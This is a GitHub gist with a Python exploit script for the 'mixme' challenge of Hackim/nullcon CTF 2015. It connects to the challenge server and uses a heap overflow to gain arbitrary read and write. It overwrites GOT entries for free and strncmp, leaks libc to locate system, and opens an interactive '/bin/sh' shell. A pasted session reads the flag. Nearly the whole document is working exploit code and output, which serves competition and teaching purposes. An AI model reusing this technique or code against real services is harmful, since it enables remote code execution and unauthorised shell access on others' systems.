Last active
August 29, 2015 14:13
-
-
Save g05u/f09524d770f8249bde6d to your computer and use it in GitHub Desktop.
Hackim/nullcon CTF 2015 - mixme exploiting 400 points
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from nulllife import * | |
| import sys, time | |
| # www.null-life.com | |
| # write-up / exploit by @_g05u_ | |
| # Hackim/nullcon CTF 2015 - mixme exploiting 400 points | |
| # Flag: aw3s0m3++_hipp1e_pwn_r0ckst4r | |
| c = 0x61 | |
| s = NullSocket("54.163.248.69", 9005) | |
| def store(name, size, data): | |
| s.writeline("store") | |
| s.readuntil("Name: ") | |
| s.writeline(name) | |
| s.readuntil("Size: ") | |
| s.writeline(str(size)) | |
| s.readuntil("Enter data: ") | |
| s.writeline(data) | |
| def edit(name, size, data): | |
| s.writeline("edit") | |
| s.readuntil("Name: ") | |
| s.writeline(name) | |
| s.readuntil("Size: ") | |
| s.writeline(str(size)) | |
| s.readuntil("new data: ") | |
| s.write(data) | |
| def get(name, size): | |
| s.writeline("get") | |
| s.readuntil("Name: ") | |
| s.writeline(name) | |
| s.readuntil("Size: ") | |
| s.writeline(str(size)) | |
| return s.read(size) | |
| def write_arbitrary(addr, size, data): | |
| global c | |
| store(chr(c), 1, chr(c ^ 0x20)) | |
| s.readuntil("exit): ") | |
| c += 1 | |
| store(chr(c), 1, chr(c ^ 0x20)) | |
| c += 1 | |
| s.readuntil("exit): ") | |
| edit(chr(c - 2), 40, "A" * 16 + "PWNT" + pack(0) * 3 + "DDDD" + pack(addr)) | |
| s.readuntil("exit): ") | |
| return edit("PWNT", size, data) | |
| def read_arbitrary(addr, size): | |
| global c | |
| store(chr(c), 1, chr(c ^ 0x20)) | |
| s.readuntil("exit): ") | |
| c += 1 | |
| store(chr(c), 1, chr(c ^ 0x20)) | |
| c += 1 | |
| s.readuntil("exit): ") | |
| edit(chr(c - 2), 40, "A" * 16 + "LEAK" + pack(0) * 3 + "DDDD" + pack(addr)) | |
| s.readuntil("exit): ") | |
| return get("LEAK", size) | |
| ret = 0x08048D3C | |
| write_got = 0x0804B048 | |
| free_got = 0x0804B020 | |
| strncmp_got = 0x0804B058 | |
| #bruteforce offset from write to libc base | |
| #using read_arbitrary and download libc | |
| offset_write = 0xdb530 | |
| offset_system = 0x40100 | |
| s.readuntil("exit): ") | |
| print 'Overwrite free_got' | |
| write_arbitrary(free_got, 4, pack(ret)) | |
| print 'Read write got' | |
| write_addr = struct.unpack("<I", read_arbitrary(write_got, 4))[0] | |
| system_addr = write_addr - offset_write + offset_system | |
| print 'System addr: 0x%08X' % system_addr | |
| print 'Overwrite strncmp_got' | |
| write_arbitrary(strncmp_got, 4, pack(system_addr)) | |
| s.readuntil("exit): ") | |
| print 'Got shell...' | |
| s.write("/bin/sh -i") | |
| s.interactive() | |
| ''' | |
| ls | |
| bin | |
| bin_old | |
| busybox | |
| etc | |
| flag_fix_your_permissions.txt | |
| l | |
| lib | |
| linuxrc | |
| mixme | |
| sbin | |
| srv | |
| usr | |
| Invalid input | |
| Select op (store/get/edit/exit): cat flag_fix_your_permissions.txt | |
| aw3s0m3++_hipp1e_pwn_r0ckst4r | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment